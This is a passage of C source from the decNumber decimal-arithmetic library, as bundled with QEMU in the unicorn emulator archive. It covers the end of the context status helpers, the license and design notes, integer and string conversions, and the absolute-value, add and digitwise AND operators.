(oldstatus&mask)!=0; } /* decContextTestSavedStatus */ /* ------------------------------------------------------------------ */ /* decContextTestStatus -- test bits in current status */ /* */ /* context is the context structure to be updated */ /* mask indicates the bits to be tested (the status bits that */ /* correspond to each 1 bit in the mask are tested) */ /* returns 1 if any of the tested bits are 1, or 0 otherwise */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ uInt decContextTestStatus(decContext *context, uInt mask) { return (context->status&mask)!=0; } /* decContextTestStatus */ /* ------------------------------------------------------------------ */ /* decContextZeroStatus -- clear all status bits */ /* */ /* context is the context structure to be updated */ /* returns context */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decContext *decContextZeroStatus(decContext *context) { context->status=0; return context; } /* decContextZeroStatus */ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/libdecnumber/decNumber.c���������������������������������������������������������0000664�0000000�0000000�00001207526�14675241067�0020673�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal number arithmetic module for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal Number arithmetic module */ /* ------------------------------------------------------------------ */ /* This module comprises the routines for General Decimal Arithmetic */ /* as defined in the specification which may be found on the */ /* http://www2.hursley.ibm.com/decimal web pages. It implements both */ /* the full ('extended') arithmetic and the simpler ('subset') */ /* arithmetic. */ /* */ /* Usage notes: */ /* */ /* 1. This code is ANSI C89 except: */ /* */ /* If DECDPUN>4 or DECUSE64=1, the C99 64-bit int64_t and */ /* uint64_t types may be used. To avoid these, set DECUSE64=0 */ /* and DECDPUN<=4 (see documentation). */ /* */ /* 2. The decNumber format which this library uses is optimized for */ /* efficient processing of relatively short numbers; in particular */ /* it allows the use of fixed sized structures and minimizes copy */ /* and move operations. It does, however, support arbitrary */ /* precision (up to 999,999,999 digits) and arbitrary exponent */ /* range (Emax in the range 0 through 999,999,999 and Emin in the */ /* range -999,999,999 through 0). Mathematical functions (for */ /* example decNumberExp) as identified below are restricted more */ /* tightly: digits, emax, and -emin in the context must be <= */ /* DEC_MAX_MATH (999999), and their operand(s) must be within */ /* these bounds. */ /* */ /* 3. Logical functions are further restricted; their operands must */ /* be finite, positive, have an exponent of zero, and all digits */ /* must be either 0 or 1. The result will only contain digits */ /* which are 0 or 1 (and will have exponent=0 and a sign of 0). */ /* */ /* 4. Operands to operator functions are never modified unless they */ /* are also specified to be the result number (which is always */ /* permitted). Other than that case, operands must not overlap. */ /* */ /* 5. Error handling: the type of the error is ORed into the status */ /* flags in the current context (decContext structure). The */ /* SIGFPE signal is then raised if the corresponding trap-enabler */ /* flag in the decContext is set (is 1). */ /* */ /* It is the responsibility of the caller to clear the status */ /* flags as required. */ /* */ /* The result of any routine which returns a number will always */ /* be a valid number (which may be a special value, such as an */ /* Infinity or NaN). */ /* */ /* 6. The decNumber format is not an exchangeable concrete */ /* representation as it comprises fields which may be machine- */ /* dependent (packed or unpacked, or special length, for example). */ /* Canonical conversions to and from strings are provided; other */ /* conversions are available in separate modules. */ /* */ /* 7. Normally, input operands are assumed to be valid. Set DECCHECK */ /* to 1 for extended operand checking (including NULL operands). */ /* Results are undefined if a badly-formed structure (or a NULL */ /* pointer to a structure) is provided, though with DECCHECK */ /* enabled the operator routines are protected against exceptions. */ /* (Except if the result pointer is NULL, which is unrecoverable.) */ /* */ /* However, the routines will never cause exceptions if they are */ /* given well-formed operands, even if the value of the operands */ /* is inappropriate for the operation and DECCHECK is not set. */ /* (Except for SIGFPE, as and where documented.) */ /* */ /* 8. Subset arithmetic is available only if DECSUBSET is set to 1. */ /* ------------------------------------------------------------------ */ /* Implementation notes for maintenance of this module: */ /* */ /* 1. Storage leak protection: Routines which use malloc are not */ /* permitted to use return for fastpath or error exits (i.e., */ /* they follow strict structured programming conventions). */ /* Instead they have a do{}while(0); construct surrounding the */ /* code which is protected -- break may be used to exit this. */ /* Other routines can safely use the return statement inline. */ /* */ /* Storage leak accounting can be enabled using DECALLOC. */ /* */ /* 2. All loops use the for(;;) construct. Any do construct does */ /* not loop; it is for allocation protection as just described. */ /* */ /* 3. Setting status in the context must always be the very last */ /* action in a routine, as non-0 status may raise a trap and hence */ /* the call to set status may not return (if the handler uses long */ /* jump). Therefore all cleanup must be done first. In general, */ /* to achieve this status is accumulated and is only applied just */ /* before return by calling decContextSetStatus (via decStatus). */ /* */ /* Routines which allocate storage cannot, in general, use the */ /* 'top level' routines which could cause a non-returning */ /* transfer of control. The decXxxxOp routines are safe (do not */ /* call decStatus even if traps are set in the context) and should */ /* be used instead (they are also a little faster). */ /* */ /* 4. Exponent checking is minimized by allowing the exponent to */ /* grow outside its limits during calculations, provided that */ /* the decFinalize function is called later. Multiplication and */ /* division, and intermediate calculations in exponentiation, */ /* require more careful checks because of the risk of 31-bit */ /* overflow (the most negative valid exponent is -1999999997, for */ /* a 999999999-digit number with adjusted exponent of -999999999). */ /* */ /* 5. Rounding is deferred until finalization of results, with any */ /* 'off to the right' data being represented as a single digit */ /* residue (in the range -1 through 9). This avoids any double- */ /* rounding when more than one shortening takes place (for */ /* example, when a result is subnormal). */ /* */ /* 6. The digits count is allowed to rise to a multiple of DECDPUN */ /* during many operations, so whole Units are handled and exact */ /* accounting of digits is not needed. The correct digits value */ /* is found by decGetDigits, which accounts for leading zeros. */ /* This must be called before any rounding if the number of digits */ /* is not known exactly. */ /* */ /* 7. The multiply-by-reciprocal 'trick' is used for partitioning */ /* numbers up to four digits, using appropriate constants. This */ /* is not useful for longer numbers because overflow of 32 bits */ /* would lead to 4 multiplies, which is almost as expensive as */ /* a divide (unless a floating-point or 64-bit multiply is */ /* assumed to be available). */ /* */ /* 8. Unusual abbreviations that may be used in the commentary: */ /* lhs -- left hand side (operand, of an operation) */ /* lsd -- least significant digit (of coefficient) */ /* lsu -- least significant Unit (of coefficient) */ /* msd -- most significant digit (of coefficient) */ /* msi -- most significant item (in an array) */ /* msu -- most significant Unit (of coefficient) */ /* rhs -- right hand side (operand, of an operation) */ /* +ve -- positive */ /* -ve -- negative */ /* ** -- raise to the power */ /* ------------------------------------------------------------------ */ #include "qemu/osdep.h" #include "libdecnumber/dconfig.h" #include "libdecnumber/decNumber.h" #include "libdecnumber/decNumberLocal.h" /* Constants */ /* Public lookup table used by the D2U macro */ const uByte d2utable[DECMAXD2U+1]=D2UTABLE; #define DECVERB 1 /* set to 1 for verbose DECCHECK */ #define powers DECPOWERS /* old internal name */ /* Local constants */ #define DIVIDE 0x80 /* Divide operators */ #define REMAINDER 0x40 /* .. */ #define DIVIDEINT 0x20 /* .. */ #define REMNEAR 0x10 /* .. */ #define COMPARE 0x01 /* Compare operators */ #define COMPMAX 0x02 /* .. */ #define COMPMIN 0x03 /* .. */ #define COMPTOTAL 0x04 /* .. */ #define COMPNAN 0x05 /* .. [NaN processing] */ #define COMPSIG 0x06 /* .. [signaling COMPARE] */ #define COMPMAXMAG 0x07 /* .. */ #define COMPMINMAG 0x08 /* .. */ #define DEC_sNaN 0x40000000 /* local status: sNaN signal */ #define BADINT (Int)0x80000000 /* most-negative Int; error indicator */ /* Next two indicate an integer >= 10**6, and its parity (bottom bit) */ #define BIGEVEN (Int)0x80000002 #define BIGODD (Int)0x80000003 static Unit uarrone[1]={1}; /* Unit array of 1, used for incrementing */ /* Granularity-dependent code */ #if DECDPUN<=4 #define eInt Int /* extended integer */ #define ueInt uInt /* unsigned extended integer */ /* Constant multipliers for divide-by-power-of five using reciprocal */ /* multiply, after removing powers of 2 by shifting, and final shift */ /* of 17 [we only need up to **4] */ static const uInt multies[]={131073, 26215, 5243, 1049, 210}; /* QUOT10 -- macro to return the quotient of unit u divided by 10**n */ #define QUOT10(u, n) ((((uInt)(u)>>(n))*multies[n])>>17) #else /* For DECDPUN>4 non-ANSI-89 64-bit types are needed. */ #if !DECUSE64 #error decNumber.c: DECUSE64 must be 1 when DECDPUN>4 #endif #define eInt Long /* extended integer */ #define ueInt uLong /* unsigned extended integer */ #endif /* Local routines */ static decNumber * decAddOp(decNumber *, const decNumber *, const decNumber *, decContext *, uByte, uInt *); static Flag decBiStr(const char *, const char *, const char *); static uInt decCheckMath(const decNumber *, decContext *, uInt *); static void decApplyRound(decNumber *, decContext *, Int, uInt *); static Int decCompare(const decNumber *lhs, const decNumber *rhs, Flag); static decNumber * decCompareOp(decNumber *, const decNumber *, const decNumber *, decContext *, Flag, uInt *); static void decCopyFit(decNumber *, const decNumber *, decContext *, Int *, uInt *); static decNumber * decDecap(decNumber *, Int); static decNumber * decDivideOp(decNumber *, const decNumber *, const decNumber *, decContext *, Flag, uInt *); static decNumber * decExpOp(decNumber *, const decNumber *, decContext *, uInt *); static void decFinalize(decNumber *, decContext *, Int *, uInt *); static Int decGetDigits(Unit *, Int); static Int decGetInt(const decNumber *); static decNumber * decLnOp(decNumber *, const decNumber *, decContext *, uInt *); static decNumber * decMultiplyOp(decNumber *, const decNumber *, const decNumber *, decContext *, uInt *); static decNumber * decNaNs(decNumber *, const decNumber *, const decNumber *, decContext *, uInt *); static decNumber * decQuantizeOp(decNumber *, const decNumber *, const decNumber *, decContext *, Flag, uInt *); static void decReverse(Unit *, Unit *); static void decSetCoeff(decNumber *, decContext *, const Unit *, Int, Int *, uInt *); static void decSetMaxValue(decNumber *, decContext *); static void decSetOverflow(decNumber *, decContext *, uInt *); static void decSetSubnormal(decNumber *, decContext *, Int *, uInt *); static Int decShiftToLeast(Unit *, Int, Int); static Int decShiftToMost(Unit *, Int, Int); static void decStatus(decNumber *, uInt, decContext *); static void decToString(const decNumber *, char[], Flag); static decNumber * decTrim(decNumber *, decContext *, Flag, Int *); static Int decUnitAddSub(const Unit *, Int, const Unit *, Int, Int, Unit *, Int); static Int decUnitCompare(const Unit *, Int, const Unit *, Int, Int); #if !DECSUBSET /* decFinish == decFinalize when no subset arithmetic needed */ #define decFinish(a,b,c,d) decFinalize(a,b,c,d) #else static void decFinish(decNumber *, decContext *, Int *, uInt *); static decNumber * decRoundOperand(const decNumber *, decContext *, uInt *); #endif /* Local macros */ /* masked special-values bits */ #define SPECIALARG (rhs->bits & DECSPECIAL) #define SPECIALARGS ((lhs->bits | rhs->bits) & DECSPECIAL) /* Diagnostic macros, etc. */ #if DECALLOC /* Handle malloc/free accounting. If enabled, our accountable routines */ /* are used; otherwise the code just goes straight to the system malloc */ /* and free routines. */ #define malloc(a) decMalloc(a) #define free(a) decFree(a) #define DECFENCE 0x5a /* corruption detector */ /* 'Our' malloc and free: */ static void *decMalloc(size_t); static void decFree(void *); uInt decAllocBytes=0; /* count of bytes allocated */ /* Note that DECALLOC code only checks for storage buffer overflow. */ /* To check for memory leaks, the decAllocBytes variable must be */ /* checked to be 0 at appropriate times (e.g., after the test */ /* harness completes a set of tests). This checking may be unreliable */ /* if the testing is done in a multi-thread environment. */ #endif #if DECCHECK /* Optional checking routines. Enabling these means that decNumber */ /* and decContext operands to operator routines are checked for */ /* correctness. This roughly doubles the execution time of the */ /* fastest routines (and adds 600+ bytes), so should not normally be */ /* used in 'production'. */ /* decCheckInexact is used to check that inexact results have a full */ /* complement of digits (where appropriate -- this is not the case */ /* for Quantize, for example) */ #define DECUNRESU ((decNumber *)(void *)0xffffffff) #define DECUNUSED ((const decNumber *)(void *)0xffffffff) #define DECUNCONT ((decContext *)(void *)(0xffffffff)) static Flag decCheckOperands(decNumber *, const decNumber *, const decNumber *, decContext *); static Flag decCheckNumber(const decNumber *); static void decCheckInexact(const decNumber *, decContext *); #endif #if DECTRACE || DECCHECK /* Optional trace/debugging routines (may or may not be used) */ void decNumberShow(const decNumber *); /* displays the components of a number */ static void decDumpAr(char, const Unit *, Int); #endif /* ================================================================== */ /* Conversions */ /* ================================================================== */ /* ------------------------------------------------------------------ */ /* from-int32 -- conversion from Int or uInt */ /* */ /* dn is the decNumber to receive the integer */ /* in or uin is the integer to be converted */ /* returns dn */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ decNumber * decNumberFromInt32(decNumber *dn, Int in) { uInt unsig; if (in>=0) unsig=in; else { /* negative (possibly BADINT) */ if (in==BADINT) unsig=(uInt)1073741824*2; /* special case */ else unsig=-in; /* invert */ } /* in is now positive */ decNumberFromUInt32(dn, unsig); if (in<0) dn->bits=DECNEG; /* sign needed */ return dn; } /* decNumberFromInt32 */ decNumber * decNumberFromUInt32(decNumber *dn, uInt uin) { Unit *up; /* work pointer */ decNumberZero(dn); /* clean */ if (uin==0) return dn; /* [or decGetDigits bad call] */ for (up=dn->lsu; uin>0; up++) { *up=(Unit)(uin%(DECDPUNMAX+1)); uin=uin/(DECDPUNMAX+1); } dn->digits=decGetDigits(dn->lsu, up-dn->lsu); return dn; } /* decNumberFromUInt32 */ /* ------------------------------------------------------------------ */ /* to-int32 -- conversion to Int or uInt */ /* */ /* dn is the decNumber to convert */ /* set is the context for reporting errors */ /* returns the converted decNumber, or 0 if Invalid is set */ /* */ /* Invalid is set if the decNumber does not have exponent==0 or if */ /* it is a NaN, Infinite, or out-of-range. */ /* ------------------------------------------------------------------ */ Int decNumberToInt32(const decNumber *dn, decContext *set) { #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, dn, set)) return 0; #endif /* special or too many digits, or bad exponent */ if (dn->bits&DECSPECIAL || dn->digits>10 || dn->exponent!=0) ; /* bad */ else { /* is a finite integer with 10 or fewer digits */ Int d; /* work */ const Unit *up; /* .. */ uInt hi=0, lo; /* .. */ up=dn->lsu; /* -> lsu */ lo=*up; /* get 1 to 9 digits */ #if DECDPUN>1 /* split to higher */ hi=lo/10; lo=lo%10; #endif up++; /* collect remaining Units, if any, into hi */ for (d=DECDPUN; d<dn->digits; up++, d+=DECDPUN) hi+=*up*powers[d-1]; /* now low has the lsd, hi the remainder */ if (hi>214748364 || (hi==214748364 && lo>7)) { /* out of range? */ /* most-negative is a reprieve */ if (dn->bits&DECNEG && hi==214748364 && lo==8) return 0x80000000; /* bad -- drop through */ } else { /* in-range always */ Int i=X10(hi)+lo; if (dn->bits&DECNEG) return -i; return i; } } /* integer */ decContextSetStatus(set, DEC_Invalid_operation); /* [may not return] */ return 0; } /* decNumberToInt32 */ uInt decNumberToUInt32(const decNumber *dn, decContext *set) { #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, dn, set)) return 0; #endif /* special or too many digits, or bad exponent, or negative (<0) */ if (dn->bits&DECSPECIAL || dn->digits>10 || dn->exponent!=0 || (dn->bits&DECNEG && !ISZERO(dn))); /* bad */ else { /* is a finite integer with 10 or fewer digits */ Int d; /* work */ const Unit *up; /* .. */ uInt hi=0, lo; /* .. */ up=dn->lsu; /* -> lsu */ lo=*up; /* get 1 to 9 digits */ #if DECDPUN>1 /* split to higher */ hi=lo/10; lo=lo%10; #endif up++; /* collect remaining Units, if any, into hi */ for (d=DECDPUN; d<dn->digits; up++, d+=DECDPUN) hi+=*up*powers[d-1]; /* now low has the lsd, hi the remainder */ if (hi>429496729 || (hi==429496729 && lo>5)) ; /* no reprieve possible */ else return X10(hi)+lo; } /* integer */ decContextSetStatus(set, DEC_Invalid_operation); /* [may not return] */ return 0; } /* decNumberToUInt32 */ decNumber *decNumberFromInt64(decNumber *dn, int64_t in) { uint64_t unsig = in; if (in < 0) { #ifdef _MSC_VER unsig = 0 - unsig; #else unsig = -unsig; #endif } decNumberFromUInt64(dn, unsig); if (in < 0) { dn->bits = DECNEG; /* sign needed */ } return dn; } /* decNumberFromInt64 */ decNumber *decNumberFromUInt64(decNumber *dn, uint64_t uin) { Unit *up; /* work pointer */ decNumberZero(dn); /* clean */ if (uin == 0) { return dn; /* [or decGetDigits bad call] */ } for (up = dn->lsu; uin > 0; up++) { *up = (Unit)(uin % (DECDPUNMAX + 1)); uin = uin / (DECDPUNMAX + 1); } dn->digits = decGetDigits(dn->lsu, up-dn->lsu); return dn; } /* decNumberFromUInt64 */ /* ------------------------------------------------------------------ */ /* to-int64 -- conversion to int64 */ /* */ /* dn is the decNumber to convert. dn is assumed to have been */ /* rounded to a floating point integer value. */ /* set is the context for reporting errors */ /* returns the converted decNumber, or 0 if Invalid is set */ /* */ /* Invalid is set if the decNumber is a NaN, Infinite or is out of */ /* range for a signed 64 bit integer. */ /* ------------------------------------------------------------------ */ int64_t decNumberIntegralToInt64(const decNumber *dn, decContext *set) { if (decNumberIsSpecial(dn) || (dn->exponent < 0) || (dn->digits + dn->exponent > 19)) { goto Invalid; } else { int64_t d; /* work */ const Unit *up; /* .. */ uint64_t hi = 0; up = dn->lsu; /* -> lsu */ for (d = 1; d <= dn->digits; up++, d += DECDPUN) { uint64_t prev = hi; hi += *up * powers[d-1]; if ((hi < prev) || (hi > INT64_MAX)) { goto Invalid; } } uint64_t prev = hi; hi *= (uint64_t)powers[dn->exponent]; if ((hi < prev) || (hi > INT64_MAX)) { goto Invalid; } return (decNumberIsNegative(dn)) ? -((int64_t)hi) : (int64_t)hi; } Invalid: decContextSetStatus(set, DEC_Invalid_operation); return 0; } /* decNumberIntegralToInt64 */ /* ------------------------------------------------------------------ */ /* to-scientific-string -- conversion to numeric string */ /* to-engineering-string -- conversion to numeric string */ /* */ /* decNumberToString(dn, string); */ /* decNumberToEngString(dn, string); */ /* */ /* dn is the decNumber to convert */ /* string is the string where the result will be laid out */ /* */ /* string must be at least dn->digits+14 characters long */ /* */ /* No error is possible, and no status can be set. */ /* ------------------------------------------------------------------ */ char * decNumberToString(const decNumber *dn, char *string){ decToString(dn, string, 0); return string; } /* DecNumberToString */ char * decNumberToEngString(const decNumber *dn, char *string){ decToString(dn, string, 1); return string; } /* DecNumberToEngString */ /* ------------------------------------------------------------------ */ /* to-number -- conversion from numeric string */ /* */ /* decNumberFromString -- convert string to decNumber */ /* dn -- the number structure to fill */ /* chars[] -- the string to convert ('\0' terminated) */ /* set -- the context used for processing any error, */ /* determining the maximum precision available */ /* (set.digits), determining the maximum and minimum */ /* exponent (set.emax and set.emin), determining if */ /* extended values are allowed, and checking the */ /* rounding mode if overflow occurs or rounding is */ /* needed. */ /* */ /* The length of the coefficient and the size of the exponent are */ /* checked by this routine, so the correct error (Underflow or */ /* Overflow) can be reported or rounding applied, as necessary. */ /* */ /* If bad syntax is detected, the result will be a quiet NaN. */ /* ------------------------------------------------------------------ */ decNumber * decNumberFromString(decNumber *dn, const char chars[], decContext *set) { Int exponent=0; /* working exponent [assume 0] */ uByte bits=0; /* working flags [assume +ve] */ Unit *res; /* where result will be built */ Unit resbuff[SD2U(DECBUFFER+9)];/* local buffer in case need temporary */ /* [+9 allows for ln() constants] */ Unit *allocres=NULL; /* -> allocated result, iff allocated */ Int d=0; /* count of digits found in decimal part */ const char *dotchar=NULL; /* where dot was found */ const char *cfirst=chars; /* -> first character of decimal part */ const char *last=NULL; /* -> last digit of decimal part */ const char *c; /* work */ Unit *up; /* .. */ #if DECDPUN>1 Int cut, out; /* .. */ #endif Int residue; /* rounding residue */ uInt status=0; /* error code */ #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, DECUNUSED, set)) return decNumberZero(dn); #endif do { /* status & malloc protection */ for (c=chars;; c++) { /* -> input character */ if (*c>='0' && *c<='9') { /* test for Arabic digit */ last=c; d++; /* count of real digits */ continue; /* still in decimal part */ } if (*c=='.' && dotchar==NULL) { /* first '.' */ dotchar=c; /* record offset into decimal part */ if (c==cfirst) cfirst++; /* first digit must follow */ continue;} if (c==chars) { /* first in string... */ if (*c=='-') { /* valid - sign */ cfirst++; bits=DECNEG; continue;} if (*c=='+') { /* valid + sign */ cfirst++; continue;} } /* *c is not a digit, or a valid +, -, or '.' */ break; } /* c */ if (last==NULL) { /* no digits yet */ status=DEC_Conversion_syntax;/* assume the worst */ if (*c=='\0') break; /* and no more to come... */ #if DECSUBSET /* if subset then infinities and NaNs are not allowed */ if (!set->extended) break; /* hopeless */ #endif /* Infinities and NaNs are possible, here */ if (dotchar!=NULL) break; /* .. unless had a dot */ decNumberZero(dn); /* be optimistic */ if (decBiStr(c, "infinity", "INFINITY") || decBiStr(c, "inf", "INF")) { dn->bits=bits | DECINF; status=0; /* is OK */ break; /* all done */ } /* a NaN expected */ /* 2003.09.10 NaNs are now permitted to have a sign */ dn->bits=bits | DECNAN; /* assume simple NaN */ if (*c=='s' || *c=='S') { /* looks like an sNaN */ c++; dn->bits=bits | DECSNAN; } if (*c!='n' && *c!='N') break; /* check caseless "NaN" */ c++; if (*c!='a' && *c!='A') break; /* .. */ c++; if (*c!='n' && *c!='N') break; /* .. */ c++; /* now either nothing, or nnnn payload, expected */ /* -> start of integer and skip leading 0s [including plain 0] */ for (cfirst=c; *cfirst=='0';) cfirst++; if (*cfirst=='\0') { /* "NaN" or "sNaN", maybe with all 0s */ status=0; /* it's good */ break; /* .. */ } /* something other than 0s; setup last and d as usual [no dots] */ for (c=cfirst;; c++, d++) { if (*c<'0' || *c>'9') break; /* test for Arabic digit */ last=c; } if (*c!='\0') break; /* not all digits */ if (d>set->digits-1) { /* [NB: payload in a decNumber can be full length unless */ /* clamped, in which case can only be digits-1] */ if (set->clamp) break; if (d>set->digits) break; } /* too many digits? */ /* good; drop through to convert the integer to coefficient */ status=0; /* syntax is OK */ bits=dn->bits; /* for copy-back */ } /* last==NULL */ else if (*c!='\0') { /* more to process... */ /* had some digits; exponent is only valid sequence now */ Flag nege; /* 1=negative exponent */ const char *firstexp; /* -> first significant exponent digit */ status=DEC_Conversion_syntax;/* assume the worst */ if (*c!='e' && *c!='E') break; /* Found 'e' or 'E' -- now process explicit exponent */ /* 1998.07.11: sign no longer required */ nege=0; c++; /* to (possible) sign */ if (*c=='-') {nege=1; c++;} else if (*c=='+') c++; if (*c=='\0') break; for (; *c=='0' && *(c+1)!='\0';) c++; /* strip insignificant zeros */ firstexp=c; /* save exponent digit place */ for (; ;c++) { if (*c<'0' || *c>'9') break; /* not a digit */ exponent=X10(exponent)+(Int)*c-(Int)'0'; } /* c */ /* if not now on a '\0', *c must not be a digit */ if (*c!='\0') break; /* (this next test must be after the syntax checks) */ /* if it was too long the exponent may have wrapped, so check */ /* carefully and set it to a certain overflow if wrap possible */ if (c>=firstexp+9+1) { if (c>firstexp+9+1 || *firstexp>'1') exponent=DECNUMMAXE*2; /* [up to 1999999999 is OK, for example 1E-1000000998] */ } if (nege) exponent=-exponent; /* was negative */ status=0; /* is OK */ } /* stuff after digits */ /* Here when whole string has been inspected; syntax is good */ /* cfirst->first digit (never dot), last->last digit (ditto) */ /* strip leading zeros/dot [leave final 0 if all 0's] */ if (*cfirst=='0') { /* [cfirst has stepped over .] */ for (c=cfirst; c<last; c++, cfirst++) { if (*c=='.') continue; /* ignore dots */ if (*c!='0') break; /* non-zero found */ d--; /* 0 stripped */ } /* c */ #if DECSUBSET /* make a rapid exit for easy zeros if !extended */ if (*cfirst=='0' && !set->extended) { decNumberZero(dn); /* clean result */ break; /* [could be return] */ } #endif } /* at least one leading 0 */ /* Handle decimal point... */ if (dotchar!=NULL && dotchar<last) /* non-trailing '.' found? */ exponent-=(last-dotchar); /* adjust exponent */ /* [we can now ignore the .] */ /* OK, the digits string is good. Assemble in the decNumber, or in */ /* a temporary units array if rounding is needed */ if (d<=set->digits) res=dn->lsu; /* fits into supplied decNumber */ else { /* rounding needed */ Int needbytes=D2U(d)*sizeof(Unit);/* bytes needed */ res=resbuff; /* assume use local buffer */ if (needbytes>(Int)sizeof(resbuff)) { /* too big for local */ allocres=(Unit *)malloc(needbytes); if (allocres==NULL) {status|=DEC_Insufficient_storage; break;} res=allocres; } } /* res now -> number lsu, buffer, or allocated storage for Unit array */ /* Place the coefficient into the selected Unit array */ /* [this is often 70% of the cost of this function when DECDPUN>1] */ #if DECDPUN>1 out=0; /* accumulator */ up=res+D2U(d)-1; /* -> msu */ cut=d-(up-res)*DECDPUN; /* digits in top unit */ for (c=cfirst;; c++) { /* along the digits */ if (*c=='.') continue; /* ignore '.' [don't decrement cut] */ out=X10(out)+(Int)*c-(Int)'0'; if (c==last) break; /* done [never get to trailing '.'] */ cut--; if (cut>0) continue; /* more for this unit */ *up=(Unit)out; /* write unit */ up--; /* prepare for unit below.. */ cut=DECDPUN; /* .. */ out=0; /* .. */ } /* c */ *up=(Unit)out; /* write lsu */ #else /* DECDPUN==1 */ up=res; /* -> lsu */ for (c=last; c>=cfirst; c--) { /* over each character, from least */ if (*c=='.') continue; /* ignore . [don't step up] */ *up=(Unit)((Int)*c-(Int)'0'); up++; } /* c */ #endif dn->bits=bits; dn->exponent=exponent; dn->digits=d; /* if not in number (too long) shorten into the number */ if (d>set->digits) { residue=0; decSetCoeff(dn, set, res, d, &residue, &status); /* always check for overflow or subnormal and round as needed */ decFinalize(dn, set, &residue, &status); } else { /* no rounding, but may still have overflow or subnormal */ /* [these tests are just for performance; finalize repeats them] */ if ((dn->exponent-1<set->emin-dn->digits) || (dn->exponent-1>set->emax-set->digits)) { residue=0; decFinalize(dn, set, &residue, &status); } } /* decNumberShow(dn); */ } while(0); /* [for break] */ if (allocres!=NULL) free(allocres); /* drop any storage used */ if (status!=0) decStatus(dn, status, set); return dn; } /* decNumberFromString */ /* ================================================================== */ /* Operators */ /* ================================================================== */ /* ------------------------------------------------------------------ */ /* decNumberAbs -- absolute value operator */ /* */ /* This computes C = abs(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* See also decNumberCopyAbs for a quiet bitwise version of this. */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ /* This has the same effect as decNumberPlus unless A is negative, */ /* in which case it has the same effect as decNumberMinus. */ /* ------------------------------------------------------------------ */ decNumber * decNumberAbs(decNumber *res, const decNumber *rhs, decContext *set) { decNumber dzero; /* for 0 */ uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif decNumberZero(&dzero); /* set 0 */ dzero.exponent=rhs->exponent; /* [no coefficient expansion] */ decAddOp(res, &dzero, rhs, set, (uByte)(rhs->bits & DECNEG), &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberAbs */ /* ------------------------------------------------------------------ */ /* decNumberAdd -- add two Numbers */ /* */ /* This computes C = A + B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X+X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ /* This just calls the routine shared with Subtract */ decNumber * decNumberAdd(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decAddOp(res, lhs, rhs, set, 0, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberAdd */ /* ------------------------------------------------------------------ */ /* decNumberAnd -- AND two Numbers, digitwise */ /* */ /* This computes C = A & B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X&X) */ /* lhs is A */ /* rhs is B */ /* set is the context (used for result length and error report) */ /* */ /* C must have space for set->digits digits. */ /* */ /* Logical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* ------------------------------------------------------------------ */ decNumber * decNumberAnd(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { const Unit *ua, *ub; /* -> operands */ const Unit *msua, *msub; /* -> operand msus */ Unit *uc, *msuc; /* -> result and its msu */ Int msudigs; /* digits in res msu */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif if (lhs->exponent!=0 || decNumberIsSpecial(lhs) || decNumberIsNegative(lhs) || rhs->exponent!=0 || decNumberIsSpecial(rhs) || decNumberIsNegative(rhs)) { decStatus(res, DEC_Invalid_operation, set); return res; } /* operands are valid */ ua=lhs->lsu; /* bottom-up */ ub=rhs->lsu; /* .. */ uc=res->lsu; /* .. */ msua=ua+D2U(lhs->digits)-1; /* -> msu of lhs */ msub=ub+D2U(rhs->digits)-1; /* -> msu of rhs */ msuc=uc+D2U(set->digits)-1; /* -> msu of result */ msudigs=MSUDIGITS(set->digits); /* [faster than remainder] */ for (; uc<=msuc; ua++, ub++, uc++) { /* Unit loop */ Unit a, b; /* extract units */ if (ua>msua) a=0; else a=*ua; if (ub>msub) b=0; else b=*ub; *uc=0; /* can now write back */ if (a|b) { /* maybe 1 bits to examine */ Int i, j; *uc=0; /* can now write back */ /* This loop could be unrolled and/or use BIN2BCD tables */ for (i=0; i<DECDPUN; i++) { if (a&b&1) *uc=*uc+(Unit)powers[i]; /* effect AND */ j=a%10; a=a/10; j|=b%10; b=b/10; if (j>1) { decStatus(res, DEC_Invalid_operation, set); return res; } if (uc==msuc && i==msudigs-1) break; /* just did final digit */ } /* each digit */ } /* both OK */ } /* each unit */ /* [here uc-1 is the msu of the result] */ res->digits=decGetDigits(res->lsu, uc-res->lsu); res->exponent=0; /* integer */ res->bits=0; /* sign=0 */ return res; /* [no status to set] */ } 